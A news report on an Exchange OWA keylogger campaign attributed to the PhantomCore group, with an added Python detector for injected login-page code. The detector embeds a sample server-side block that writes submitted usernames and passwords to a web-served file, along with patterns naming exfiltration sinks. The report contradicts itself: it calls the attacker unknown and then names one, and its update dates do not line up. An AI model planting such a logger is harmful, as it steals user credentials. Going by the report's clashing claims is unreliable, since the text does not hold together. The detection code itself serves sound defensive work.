According to a Russian cybersecurity vendor, the attacks have targeted 65 victims across 26 countries. The attack chains involve inserting keylogger code into the Exchange login page by exploiting known vulnerabilities in Microsoft Exchange Server. The file that holds the stolen data is reachable from the external network.
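As an added example (not code from the article or from Positive Technologies), here is a defender-side heuristic that scans an OWA logon page for an inline block that both reads the submitted credentials and writes them to a file or sends them out, plus a baseline-hash comparison. The sample page, field names and file path are constructed for illustration.

```python
"""Heuristic scan of an Exchange OWA logon.aspx for an injected credential
logger. Added example; the sample page below is constructed, not a real
artifact from the campaign."""
import hashlib
import re

# Constructed sample: the original logon form plus an injected server-side
# block that reads the submitted credentials and appends them to a file
# under the web-served directory (the path is illustrative).
SAMPLE_LOGON_ASPX = """<%@ Page Language="C#" %>
<html><body>
<form id="logonForm" method="post">
  <input id="username" name="username" type="text">
  <input id="password" name="password" type="password">
</form>
<script>document.getElementById('username').focus();</script>
<%
  if (Request.Form["password"] != null) {
    System.IO.File.AppendAllText(
      Server.MapPath("/owa/auth/") + "log.txt",
      Request.Form["username"] + ":" + Request.Form["password"] + "\\n");
  }
%>
</body></html>"""

# Inline blocks that may carry injected code: server-side <% %> (but not the
# <%@ page directive) and client-side <script> blocks.
BLOCK_RE = re.compile(r"<%(?!@)(.*?)%>|<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Reads of the submitted credentials, server- or client-side.
CRED_RE = re.compile(r"Request\.Form\[\s*[\"'](?:username|password)|"
                     r"getElementById\(\s*[\"']password", re.I)
# Sinks that persist or ship the value: file writes, outbound HTTP.
SINK_RE = re.compile(r"File\.(?:AppendAllText|WriteAllText)|StreamWriter|"
                     r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(", re.I)

def find_suspicious_blocks(page):
    """Return inline blocks that both read credentials and reach a sink."""
    hits = []
    for m in BLOCK_RE.finditer(page):
        body = m.group(1) or m.group(2) or ""
        if CRED_RE.search(body) and SINK_RE.search(body):
            hits.append(body.strip())
    return hits

def page_matches_baseline(page, baseline_sha256):
    """Compare the page text against the SHA-256 of a known-good copy."""
    return hashlib.sha256(page.encode()).hexdigest() == baseline_sha256

if __name__ == "__main__":
    for block in find_suspicious_blocks(SAMPLE_LOGON_ASPX):
        print("suspicious block:\n", block)
```

In practice the baseline hash is taken from a clean installation or from the same build on an unaffected server, and any hit on a logon page should be followed by a check of which files under the OWA directory are served to unauthenticated clients.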
The perpetrator of these attacks, which were initially reported in May 2024 as targeting organizations in Africa and the Middle East, is currently unknown. In an analysis published on August 15, 2025, Positive Technologies attributed the keyloggers to the eponymous hacking group behind the PhantomCore malware. The attribution is based on an examination of the attacker's infrastructure, which includes a password-protected archive named "archiveCalculatorVyplatSetup_1.0.6.zip" hosted on the domain "voen-pravo[.]online." The archive contains an application, built with the Qt framework, that poses as a payment calculator.
According to Galkin, "ten victims have been identified in recent months, on whose servers there is a previously considered Exchange keylogger." He stated, "All victims are Russian businesses involved in either IT consulting or IT solution development." He stated that "the number of victims is growing" and that more than 5,000 accounts have been gathered from victim systems. (This story was updated to include attribution information after publication on August 18, 2025.)
On August 17, 2025, it was also updated to remove a reference to the Russian government as the keyloggers' source and to include attribution information for a few victims. The attribution details, the number of victim systems, and the date of the alleged attacks have all been added to the story. Additionally, it has been updated to reflect that the victims are Russian, not Russian-based.